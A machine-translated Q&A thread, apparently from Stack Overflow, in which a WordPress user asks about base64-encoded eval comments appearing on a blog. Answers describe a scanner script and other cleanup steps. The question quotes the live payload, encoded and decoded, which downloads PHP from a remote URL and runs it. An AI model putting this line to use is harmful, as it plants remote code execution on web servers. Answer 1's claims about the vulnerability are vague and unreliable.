Eval Base64 病毒 Wordpress [重复]

Question

我今天正在使用 wordpress 博客，我收到了这样的评论。

<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --&gt;<!--/mfunc-->

当我使用解码器解码此评论时，我得到了

$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);

我得到了很多这样的 cmets 。谁能帮我解决这个问题。？它是黑客还是表明黑客的开始？

Answer 1

这是一次黑客攻击，或者至少是一次尝试。他们正在利用一个未解决的 wordpress 漏洞，该漏洞可以让他们下载和执行代码等。这种类型的攻击目前在网络上几乎没有公开曝光，如果它来自受过教育的来源，则可能特别令人讨厌。如果您在服务器端发现这些类型的代码 sn-ps，那么请做更多的研究以确定您是否真的被感染，如果是，感染实际达到什么程度。我已经看到整个共享托管服务器被单个 wordpress 站点管理员感染，要么通过无知允许，要么积极帮助这个问题传播。不幸的是，这个特定问题目前在网络上没有很好的记录，因此您可能需要做大量研究以确保您的网站正常。为了帮助您进行研究，我将澄清此 hack 的术语。

这是一种 PHP 代码注入 攻击，最有可能试图利用 wordpress 框架中的已知漏洞。它使用 Base64 编码的 PHP 代码通过eval() 将自身注入到您的托管服务器中，eval() 是一种编程语言结构，几乎存在于所有编程语言中，包括 PHP。具有高度组织性和高级能力的黑客最近利用此漏洞对受感染的 wordpress 网站造成了绝对的破坏，因此在处理此类问题时要格外小心。

Answer 2

没有任何建议对我们有用。以下是我们如何在不停机的情况下从多个 wordpress 网站中删除恶意代码的方法。

我们遇到了一个问题，我们有多个旧版 wordpress 网站共享一个文件系统，该文件系统已被此病毒渗透。

我们最终编写了一个小 Python 脚本来遍历我们的文件系统并检测恶意代码。

这里是任何感兴趣的人的代码（注意：使用自担风险）： https://github.com/michigan-com/eval_scrubber

pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .

该脚本将扫描文件系统中的恶意内容，并作为单独的命令尝试删除 base64 eval 函数。

这确实是一个临时解决方案，因为该病毒的生成器使用 PHP cmets 导致正则表达式不匹配。我们最终使用auditd 来监控正在向我们知道被感染的文件写入的文件：http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html

一旦我们找到了病毒的产生者，就再做一次eval_scrubber remove，然后我们的问题就解决了。

Answer 3

我正在寻找一个好的和快速的解决方案。这将帮助您找到哪些文件感染了 eval64。然后，您可以在 Dreamweaver 中使用搜索/替换，并一次将其从所有文件中删除。

Threat scan plugin

但是

有一个只有 2 行代码的索引文件。那两条线一遍又一遍地注入 eval 。我忘记了它是哪个 index.php，但请查看文件夹：

• wp-管理员
• wp 内容
• wp-包括

尝试使用 Dreamweaver 在您的文件中搜索 md5。

希望你能修复它。